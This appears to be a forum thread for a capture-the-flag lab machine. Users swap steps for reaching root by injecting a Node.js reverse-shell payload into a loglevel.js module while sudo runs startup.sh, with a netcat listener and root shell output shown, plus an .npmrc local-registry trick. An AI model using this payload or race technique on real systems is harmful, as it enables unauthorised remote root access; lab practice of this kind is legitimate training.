(June 5, 2022, 07:16 AM) orangutang Wrote: Hi everybody. About @Yondaime316's method: the folder /home/kavi/.npm is empty. And where is the file package.tgz? Thanks.
:heart:

(June 5, 2022, 07:16 AM) orangutang Wrote: Hi everybody. About @Yondaime316's method: the folder /home/kavi/.npm is empty. And where is the file package.tgz? Thanks.
:blush:

If you need help on this machine:
https://hack-the-flag.herokuapp.com/machines/473
Enjoy!

August 2, 2022 at 1:11 PM
(June 20, 2022, 09:46 PM) Toto Wrote: Anyone managed to find kavi's password in mark's shell after the patch?
From mark's home folder, create a ".npmrc" file containing:
registry=http://127.0.0.1:4873/
Then run npm install db-logger; the package will be installed under the "node_modules" folder. HTH

August 3, 2022 at 10:53 AM
(May 30, 2022, 03:13 AM) Himitsu Wrote:
(May 30, 2022, 01:54 AM) Peter Wrote:
(May 29, 2022, 06:27 AM) dude4695 Wrote: For root, better create 2 SSH connections: 1 for running startup.sh and 1 for editing the file.
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function at the top of the file:
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("bash", []); var client = new net.Socket(); client.connect(PORT, "IP", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })();
You will get this payload from here:
https://www.revshells.com/
Stop the startup.sh app and run it again; you will get a root shell.
I can't make it run. The file disappears: no reverse shell, the code to inject vanishes. Any tip or idea, please?
You need to do this a little bit faster, else the loglevel directory will be removed.
Copy this function in memory (Ctrl+C) and replace with your IP and PORT:
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("bash", []); var client = new net.Socket(); client.connect(4000, "10.10.1X.XX", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })();
1. On Terminal 1, open SSH with the kavi user.
2. On Terminal 2, open a second SSH with the kavi user, then prepare your command (but don't launch it, because the file does not exist yet): vim /opt/app/node_modules/loglevel/lib/loglevel.js
3. On Terminal 3: nc -lvnp 4000
4. On Terminal 1: sudo /opt/app/startup.sh
5. On Terminal 2: launch the command you prepared in step 2 and paste your function at the TOP, then write and exit (with :x it's faster).
6. On Terminal 1: quit and re-run sudo /opt/app/startup.sh
7. On Terminal 3: you can see your reverse shell has been triggered:
─$ nc -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)
You need to switch quickly between your 2 SSH sessions for steps 4, 5 and 6, that's all.
All explanations from @Dude4695 are enough.
Brother, everything is good, but when I write into that loglevel.js it says it's read-only, and when I press :x it says you can't change anything. Help please!!!

August 4, 2022 at 9:49 AM
(June 5, 2022, 07:16 AM) orangutang Wrote: Hi everybody. About @Yondaime316's method: the folder /home/kavi/.npm is empty. And where is the file package.tgz? Thanks.
thank you

August 6, 2022 at 8:15 PM
(June 5, 2022, 07:16 AM) orangutang Wrote: Hi everybody. About @Yondaime316's method: the folder /home/kavi/.npm is empty. And where is the file package.tgz? Thanks.
tyty

August 8, 2022 at 8:19 AM
(June 5, 2022, 07:16 AM) orangutang Wrote: Hi everybody. About @Yondaime316's method: the folder /home/kavi/.npm is empty. And where is the file package.tgz? Thanks.
ok

August 10, 2022 at 11:47 AM
(August 3, 2022, 10:53 AM) Vroo Wrote: [quotes the Himitsu / Peter / dude4695 exchange above in full]
This method doesn't work anymore. You should try from ~/.npm as @mtl87 said.

August 11, 2022 at 11:31 PM
Hey guys, the new method is not gonna be writable anymore (the machine is updated). Nothing writable...